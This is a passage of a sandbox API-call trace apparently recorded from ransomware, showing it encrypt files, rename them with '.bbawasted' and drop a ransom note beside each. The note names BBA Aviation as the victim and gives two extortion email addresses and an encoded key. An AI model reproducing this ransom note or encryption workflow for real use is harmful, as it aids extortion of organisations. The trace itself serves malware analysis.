KEY:\r\n[begin_key]CRVkqT2Gh7YHErZL2P6OabrhsYyYlElP81RkvTlY7aeoz2khx8S6o1qMHFloP5lg\r\nVopM7zZynbuynqx7eEsfnO+klU5DRNSjy46TJfVXAQrg6/40+7v9f7nNMGENBzVU\r\nsgZueI2pv6VoGKHed0vmytRKygsF03MnyKodwqOI2ZXUMri/NO52d3twW+u/qCkF\r\n4VHx8PIx5eF+ZHhZUToKrnR8xWDHwrtaZywVqxbubFhDyT74ZzDH9qmiEYGoJ98i\r\ntbg+YgdgO/V9IJqh7gSRBROx+BDV7kf6xhesLHOhbAvZHMErIXQR6dqzThnfPQG7\r\nZejGeNKvvuaUiwJzXkvMlnG2IP1dKoDwbCM/kNoT3NShTsxl8Fz+OO5FfemaN956\r\ngohmA7DmotJy7oudaY53/C6KHCUH3rZPa8QQ0jzM4dTGTRUgWvtJ2psgWWmdZdcs\r\nNEIr0nWg+gBhJWVosrpaRnsXVo38KuWQ8WG7PoLGKqYqa4rR5ez29DMoelBeNWs/\r\nRA+YSJGyPaQnVVV4TW0wGSYQ02K9Wp/E0/PmYAfSXs2K03nGd3q+bUZp7c44ou8/\r\ndbPLIWArQV0h4QxKH5Vqx0pdirUFS9VBA1vlixAtwqwLqOwYCyfHN0u6fD9p7kfU\r\nvVTfdSPLlyBMnhMd9MOz3/TX10VczHI9oxgVVK1t9VJ=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.418] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0162.419] SetEndOfFile (hFile=0x280) returned 1 [0162.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.421] CloseHandle (hObject=0x280) returned 1 [0162.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0162.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2888 | out: hHeap=0x660000) returned 1 [0162.424] _aulldvrm () returned 0x0 [0162.424] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef68) returned 1 [0162.424] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0162.424] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.424] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 48 [0162.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0162.425] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.425] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef68) returned 1 [0162.425] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.425] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.425] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0162.427] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.428] SetEndOfFile (hFile=0x280) returned 1 [0162.428] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.428] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.bbawasted")) returned 1 [0162.429] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0162.429] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0162.429] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xed90 [0162.429] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xed90) returned 0x650000 [0162.429] CloseHandle (hObject=0x294) returned 1 [0162.574] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0162.574] CloseHandle (hObject=0x288) returned 1 [0162.574] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.575] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0162.575] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.575] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.575] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0162.576] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0162.576] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.585] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.585] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.585] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0162.585] _snwprintf (in: _Dest=0x6ac8f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]bjBYMR2eAbGcmz6NgoNNQkDaGqKB058FgMxqznSZ3gq4+TTZk3QF30FkpCm6j32j\r\nc7cFb1pkC9ETH5AHxm8Hk7yOkHOedcthBVYZkqihyY912oW+BpY+O8EZUuF6tzsQ\r\n1AuCduPHjr39w+LQNOubjWW7kj5yrA0VvezkwEYXxTXObmp93PqsGQT51jD6Y3W6\r\nUDHU0OgN1TZssVmqtirlutClxayhXiWOxXkkB94P9xLufEmj+TV8KHBgt0MYDcdY\r\nx+solQk6KawVgDbzSUPj2pe1TYQrA5RsP30u/C4eJOyCan7zEL79tAuktj7xHJny\r\n7P3NrTgek1D5LENWGf4wtBCJXevfYZ2GfjD3glrB16i+UB+na/czp89/ezefVKNJ\r\na1TfRfKCK7Vk5UVPARTXQ02Z9EvVfh+KXG8k3TY/2B5Oj4VkKbDsKjSm3Ul7U9o7\r\nMcRd6ZUxB/qfgcdVJ0z4hNqWvih6NBgpm6NCuk3LCIQg+OFPs78nrKgm3twC2Umt\r\n2NGPVQCMWRTwemFpUm/1uaGrWzrnBtNRbcw/49SErJrOanRzSdD8g8szZplZ2ZYb\r\nXEEWhUhUI5cvuHWgTVANgGwZR5vLbB/lXN8KRAcVWIxJ5sGeeNJA5inuVtqY2uDv\r\npFVfye530LfOAve7wvqibJLwkcr8AwjuNF9xVi9iCQZ=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.585] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.585] WriteFile (in: hFile=0x280, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0162.585] SetEndOfFile (hFile=0x280) returned 1 [0162.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0162.588] CloseHandle (hObject=0x280) returned 1 [0162.592] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0162.592] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a15f8 | out: hHeap=0x660000) returned 1 [0162.592] _aulldvrm () returned 0x0 [0162.592] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0162.593] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0162.593] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.593] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 48 [0162.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0162.593] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0162.593] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0162.594] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6ac8f8 | out: pbBuffer=0x6ac8f8) returned 1 [0162.594] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.594] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0162.631] WriteFile (in: hFile=0x280, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.632] SetEndOfFile (hFile=0x280) returned 1 [0162.632] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.632] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0162.632] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.bbawasted")) returned 1 [0162.633] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0162.633] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0162.634] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1387c [0162.634] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1387c) returned 0x630000 [0162.634] CloseHandle (hObject=0x288) returned 1 [0162.643] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0162.643] CloseHandle (hObject=0x294) returned 1 [0162.643] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.643] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0162.644] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.644] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.645] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0162.645] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0162.645] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.654] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0162.654] _snwprintf (in: _Dest=0x6ac8f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Jd85MHT6oQ2escSI21hkMU29M7WVKJS1sR8WBlg2Z7BOmdBzCssbj3/prWNJHi2q\r\nxBROldym9mfAU6f9j2JaL3REfvQIxj9vbfofK1n6j0cUwS9afGo3OpBtKJD41Sd0\r\nPoSXD8GqaHOKnPo0NN1Fq0E3NVCYkcdnno5DFjAeJQ6ezaDWNE2yxzFyF5J5vn2K\r\nkGL0xA3nTmIIGpC5wHjh6jnN9HtL13c6Ej1QbtX7B4qUHLCmxgyyMvVp+ekHcwHA\r\nLN+v9GWYOYYeCD4Hp9+8nP98fO41tOrc0wKGygKHvPW3X2pkgXcgsgWEmrbHz16k\r\nDsIJEJpCA916W6rhpvfEEib0fWJsRwbh1AdqGqlwtcTz4S75Ztvx0gmn8KFW6lri\r\nluS8oT00cZYiv62OhubBOyZP2c5yhOC2f+PkS/XmfM7UDVviq0hwjrWSmpyVRzaT\r\ncLsTWaXgeHpIzsb0E2NGXOZJvMXMZPd4IaS5BmAWMbJBoZabzUZ0rvtcpsaJHPMj\r\n4ldEJS1xHZkzXVbaV2EjMzU4AkyKVdRekSKm8/ICeJVyyq3MxB8/PWoSfY2iAuaH\r\neEY3/sRg5qAQrqs9f3B7WiwwkfaD/meMY13XjKWZazX2DZ4vEddQnwIKioD0JS3a\r\nU3qkeyYKMGbDK1OD+nmS6n+j5q4r6x7jpqtnKm2fZma=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.654] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.654] WriteFile (in: hFile=0x280, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0162.654] SetEndOfFile (hFile=0x280) returned 1 [0162.656] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0162.656] CloseHandle (hObject=0x280) returned 1 [0162.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0162.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1b38 | out: hHeap=0x660000) returned 1 [0162.776] _aulldvrm () returned 0x0 [0162.776] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0162.777] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0162.777] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.777] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 50 [0162.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x69e318 [0162.777] lstrcpyW (in: lpString1=0x69e37c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0162.777] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0162.778] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6ac8f8 | out: pbBuffer=0x6ac8f8) returned 1 [0162.778] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.778] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0162.778] WriteFile (in: hFile=0x280, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.779] SetEndOfFile (hFile=0x280) returned 1 [0162.779] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0162.780] lstrcpyW (in: lpString1=0x69e37c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.780] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.bbawasted")) returned 1 [0162.780] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0162.780] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0162.781] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x31444 [0162.781] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x31444) returned 0x1480000 [0162.781] CloseHandle (hObject=0x294) returned 1 [0162.957] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0162.958] CloseHandle (hObject=0x288) returned 1 [0162.958] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.959] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef58) returned 1 [0162.959] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.959] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0162.959] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef58) returned 1 [0162.960] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0162.960] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0162.970] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.970] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0162.970] _snwprintf (in: _Dest=0x6ac8f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]bxotBjaFudn4zoOQwN1ulTyMaXG7btBujrA6cNr2XtTafKwFGrmpiQCcgIoCtn/S\r\nbbDSYxsFMT2MWxuATpKyWG6LRXtiBq4ndeCsNEplLmYUC8d65TFdmX92VQ8Gzmzs\r\nHG9ykI3Snz/GKh+J6Hbj+qovfHdEAyE8HzHfhcKadGJNEMVkHZj/eCMRRgOwKUJS\r\nj/UevOntWCgGA52RXC7IsPLKo/QUJwmTnmLVbmxbDEJxzBO87Bvmbe0ij07Mq8tA\r\nz+brIGNXf3RHgT0/ANqFFGukFOTrhXkzqFz2hupumxFIajHFDenNp9+Ret7LDCq7\r\nBfn74XSrjtqG+RfrGFieO0WuTcXS6HGIyHdTUBTMW3sCd0PPQGQ7n8ROJ9b9xNOh\r\nAFfkOSFuIyBs1rLMN02pDyl1ANghn4WEce5AKlfYG0eBfF9E9nUuLOpftL6poyl+\r\nCUbX5VsTigRwfocwruMZnyv6bi7E3VOnbzXgio/FnzFQTKqhVUNP0/6IOKiWcJ+D\r\nQkymaPNf76DqwVywU95Y++tDKQ2HdBn2xPkjnXvyo/eJEYW/0V1f7Oh2CCp7AeKp\r\n0RlrHNpp6eIzjEo+U8aOt0V6NIJAtFMhdTbL85Fr8sAbtK/V4j/znGHds7Ree1OE\r\n/t3o19ba9s0Xslm5nKNZHC+5vbbGYleMRmvpnai+Ozm=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.970] WriteFile (in: hFile=0x280, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0162.970] SetEndOfFile (hFile=0x280) returned 1 [0163.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0163.056] CloseHandle (hObject=0x280) returned 1 [0163.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0163.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1778 | out: hHeap=0x660000) returned 1 [0163.058] _aulldvrm () returned 0x0 [0163.058] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef58) returned 1 [0163.059] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0163.059] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.059] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 42 [0163.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25e) returned 0x69e318 [0163.059] lstrcpyW (in: lpString1=0x69e36c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.059] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef58) returned 1 [0163.060] CryptGenRandom (in: hProv=0x6aef58, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0163.060] 